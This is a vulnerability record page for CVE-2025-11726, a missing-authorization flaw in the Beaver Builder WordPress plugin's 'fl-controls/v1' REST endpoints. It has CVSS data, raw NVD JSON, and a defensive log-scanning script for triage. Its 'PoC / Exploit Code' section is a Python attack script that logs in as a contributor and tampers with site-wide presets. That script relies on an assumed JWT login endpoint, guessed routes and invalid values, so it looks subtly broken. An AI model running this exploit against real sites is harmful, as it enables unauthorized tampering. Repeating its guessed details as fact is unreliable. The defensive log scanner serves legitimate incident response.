Security Vulnerability Report
CVE-2025-11726 CVSS 4.3 MEDIUM

CVE-2025-11726

Published: 2025-12-02 08:15:51
Last Modified: 2025-12-11 20:27:36

Description

The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide.
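For triage on sites that ran an affected version, the following added example (not part of the original record or of the plugin) scans web server access logs for state-changing requests to the 'fl-controls/v1' namespace, covering both the `/wp-json/` path form and WordPress's `?rest_route=` query form. It assumes Combined Log Format; the sample lines are constructed, and the `presets` route segment is copied from this page's PoC and not verified against the plugin.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

NAMESPACE = "/fl-controls/v1"  # REST namespace named in the description
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IPs; route segments are assumptions).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Dec/2025:09:01:10 +0000] "GET /wp-json/fl-controls/v1/presets HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [02/Dec/2025:09:01:12 +0000] "POST /wp-json/fl-controls/v1/presets HTTP/1.1" 200 88 "-" "-"',
    '203.0.113.7 - - [02/Dec/2025:09:01:15 +0000] "DELETE /index.php?rest_route=%2Ffl-controls%2Fv1%2Fpresets%2F3 HTTP/1.1" 200 20 "-" "-"',
    '198.51.100.4 - - [02/Dec/2025:09:02:00 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 900 "-" "-"',
    '198.51.100.4 - - [02/Dec/2025:09:02:05 +0000] "POST /wp-json/fl-controls/v10/presets HTTP/1.1" 404 50 "-" "-"',
]


def rest_route(target):
    """Return the REST route addressed by a request target, or None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    idx = path.find("/wp-json/")
    if idx != -1:  # pretty permalinks: /wp-json/<route>
        return path[idx + len("/wp-json"):]
    # plain permalinks: ?rest_route=/<route> (parse_qs percent-decodes the value)
    routes = parse_qs(parts.query).get("rest_route")
    return routes[0] if routes else None


def find_preset_writes(lines):
    """Return (time, ip, method, route, status) for write requests to the namespace."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] not in WRITE_METHODS:
            continue
        route = rest_route(m["target"])
        if route and (route == NAMESPACE or route.startswith(NAMESPACE + "/")):
            hits.append((m["time"], m["ip"], m["method"], route, int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_preset_writes(SAMPLE_LOG):
        print(hit)
```

Access logs do not record the WordPress role behind a request, so each hit still has to be correlated with the session or account that made it.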

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:* - VULNERABLE
Beaver Builder WordPress Page Builder <= 2.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2025-11726 PoC - Beaver Builder Missing Authorization
Target: WordPress site with Beaver Builder plugin <= 2.9.4
Authentication: Contributor+ role required
'''
import requests
import json
import sys

# Configuration
TARGET_URL = "https://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"

# API Endpoints under fl-controls/v1 namespace
API_BASE = f"{TARGET_URL}/wp-json/fl-controls/v1"


def get_auth_token():
    """Get WordPress REST API authentication token"""
    login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token"
    data = {"username": USERNAME, "password": PASSWORD}
    response = requests.post(login_url, json=data)
    if response.status_code == 200:
        return response.json().get("token")
    return None


def add_global_preset(token):
    """Add malicious global color preset - unauthorized action"""
    headers = {"Authorization": f"Bearer {token}"}
    preset_data = {
        "type": "color",
        "name": "Malicious Preset",
        "value": "#malicious_color"
    }
    response = requests.post(
        f"{API_BASE}/presets",
        headers=headers,
        json=preset_data
    )
    return response


def modify_global_preset(token, preset_id):
    """Modify existing global preset - unauthorized action"""
    headers = {"Authorization": f"Bearer {token}"}
    update_data = {
        "name": "Modified Preset",
        "value": "#modified_color"
    }
    response = requests.put(
        f"{API_BASE}/presets/{preset_id}",
        headers=headers,
        json=update_data
    )
    return response


def delete_global_preset(token, preset_id):
    """Delete global preset - unauthorized action"""
    headers = {"Authorization": f"Bearer {token}"}
    response = requests.delete(
        f"{API_BASE}/presets/{preset_id}",
        headers=headers
    )
    return response


def main():
    print("[*] CVE-2025-11726 PoC - Beaver Builder Authorization Bypass")
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authenticated successfully with Contributor role")

    # Add malicious preset
    resp = add_global_preset(token)
    if resp.status_code in [200, 201]:
        print("[+] Successfully added malicious global preset (Unauthorized!)")
        print(f"[*] Response: {resp.json()}")
    else:
        print(f"[-] Failed to add preset: {resp.status_code}")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11726", "sourceIdentifier": "[email protected]", "published": "2025-12-02T08:15:51.343", "lastModified": "2025-12-11T20:27:36.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding": "2.9.4.1", "matchCriteriaId": "3CC303E8-BD30-4426-8AB7-58F4CA9E9630"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L252", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L53", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406987%40beaver-builder-lite-version&new=3406987%40beaver-builder-lite-version&sfp_email=&sfph_mail=", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b797e141-a9d2-48c4-a44e-a59a80a90a5b?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}